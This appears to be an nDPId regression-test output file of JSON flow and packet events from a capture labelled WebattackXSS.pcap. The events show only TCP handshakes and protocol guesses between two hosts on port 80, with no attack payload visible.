-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8935,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":3,"flow_last_seen":1499348046263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348046263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bZlAAD4GWD+sEAABwKgKMopEAFAJXWikCRs+8YAQAOXZPAAAAQEICgE9BTsD5tav"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348047547,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348047547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PrNAAD4Ghx2sEAABwKgKMopSAFC7TzjPAAAAAKACchDYiQAAAgQFtAQCCAoBPQZ8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":2,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348047547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQilKBYq9Yu0840KAScSDM1gAAAgQFtAQCCAoD5tfwAT0GfAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":3,"flow_last_seen":1499348047547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348047547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PrRAAD4GhySsEAABwKgKMopSAFC7TzjQgWKvWYAQAOVr3gAAAQEICgE9BnwD5tfw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348050079,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050079,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8966,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Gn1AAD4Gq1OsEAABwKgKMopsAFCVUBKIAAAAAKACchAiPQAAAgQFtAQCCAoBPQj1AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":2,"flow_last_seen":1499348050079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348050079,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQimww3+sulVASiaAScSAovgAAAgQFtAQCCAoD5tppAT0I9QEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":3,"flow_last_seen":1499348050080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348050080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gn5AAD4Gq1qsEAABwKgKMopsAFCVUBKJMN\/rL4AQAOXHxQAAAQEICgE9CPUD5tpp"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347917322,"flow_last_seen":1499347922879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347918608,"flow_last_seen":1499347923879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347921170,"flow_last_seen":1499347926880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347922471,"flow_last_seen":1499347927880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347923737,"flow_last_seen":1499347928880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347926328,"flow_last_seen":1499347931880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347927657,"flow_last_seen":1499347932881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347930265,"flow_last_seen":1499347935880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347931529,"flow_last_seen":1499347936881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347934152,"flow_last_seen":1499347939882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348050084,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348051362,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348051362,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ntRAAD4GJvysEAABwKgKMop6AFCG4ZTiAAAAAKACchCtAgAAAgQFtAQCCAoBPQo2AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":2,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348051362,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQinqx2HVxhuGU46AScSCnBwAAAgQFtAQCCAoD5tupAT0KNgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":3,"flow_last_seen":1499348051362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348051362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ntVAAD4GJwOsEAABwKgKMop6AFCG4ZTjsdh1coAQAOVGDwAAAQEICgE9CjYD5tup"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348052641,"flow_last_seen":1499348052641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348052641,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8987,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1499348052641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/xAAD4GNdSsEAABwKgKMoqIAFBipISJAAAAAKACchDgSwAAAgQFtAQCCAoBPQt1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":2,"flow_last_seen":1499348052641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348052641,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiogIs7XwYqSEiqAScSBBtwAAAgQFtAQCCAoD5tzpAT0LdQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":3,"flow_last_seen":1499348052642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348052642,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/1AAD4GNdusEAABwKgKMoqIAFBipISKCLO18YAQAOXgvQAAAQEICgE9C3YD5tzp"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348055228,"flow_last_seen":1499348055228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348055228,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9005,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1499348055228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0hAAD4GaoisEAABwKgKMoqiAFBaIFa0AAAAAKACchAUBAAAAgQFtAQCCAoBPQ38AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":2,"flow_last_seen":1499348055228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348055228,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiqK\/mxmbWiBWtaAScSBYVQAAAgQFtAQCCAoD5t9wAT0N\/AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":3,"flow_last_seen":1499348055229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348055229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W0lAAD4Gao+sEAABwKgKMoqiAFBaIFa1v5sZnIAQAOX3XAAAAQEICgE9DfwD5t9w"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348056534,"flow_last_seen":1499348056534,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348056534,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1499348056534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LdZAAD4Gl\/qsEAABwKgKMoqwAFDDZCKVAAAAAKACchDdiQAAAgQFtAQCCAoBPQ9DAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9018,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":2,"flow_last_seen":1499348056535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348056535,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQirDnT6dMw2QilqAScSBrLgAAAgQFtAQCCAoD5uC3AT0PQwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":3,"flow_last_seen":1499348056535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348056535,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LddAAD4GmAGsEAABwKgKMoqwAFDDZCKW50+nTYAQAOUKNgAAAQEICgE9D0MD5uC3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9029,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348057789,"flow_last_seen":1499348057789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348057789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
